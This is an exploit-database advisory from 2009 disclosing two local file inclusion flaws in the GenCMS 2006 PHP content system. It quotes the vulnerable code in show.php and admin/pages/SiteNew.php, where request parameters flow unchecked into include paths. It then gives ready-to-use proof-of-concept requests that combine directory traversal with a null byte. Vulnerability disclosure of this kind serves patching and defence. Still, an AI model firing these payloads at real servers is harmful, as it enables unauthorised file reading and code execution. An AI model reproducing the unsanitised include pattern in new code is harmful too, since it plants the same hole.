gencms 2006 - Multiple Vulnerabilities

EDB-ID:

9103


Author:

eLwaux

Type:

webapps


Platform:

PHP

Date:

2009-07-10


GenCMS
http://gencms.berlios.de/

eLwaux(c)2009

LFI
/show.php
----------------------------------------------------------------------------------------------------
18:   $param = $_GET['p'];
19:   if(empty($param)) $param = 'news';
20:          //get right page
21:       //$page = $param.'.php';
22:	
23:    //static or dynamic
24:    if(GC_FULLSTATIC)
25:    {
26:        $page = $param.'.htm';
27:        staticpage($page);
28:    }
29:    else
30:    {
31:        $page = GC_IPATH.'_base/sites/'.$param.'.php';
32:        dynamicpage($page);
33:    }
----------------------------------------------------------------------------------------------------
PoC: /show.php?p=../../{FILE.PHP}%00


LFI
/admin/pages/SiteNew.php
----------------------------------------------------------------------------------------------------
14:   if(!empty($_GET['step'])) $Step = $_GET['step'];
23:   if ($Step == "2")
24:   {
25:        // allgemeine settings
26:        //include blocks from template config
27:        include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
28:        $TPLBlocks = explode(';',$TemplateSettings);
29:   }
----------------------------------------------------------------------------------------------------
PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )

# milw0rm.com [2009-07-10]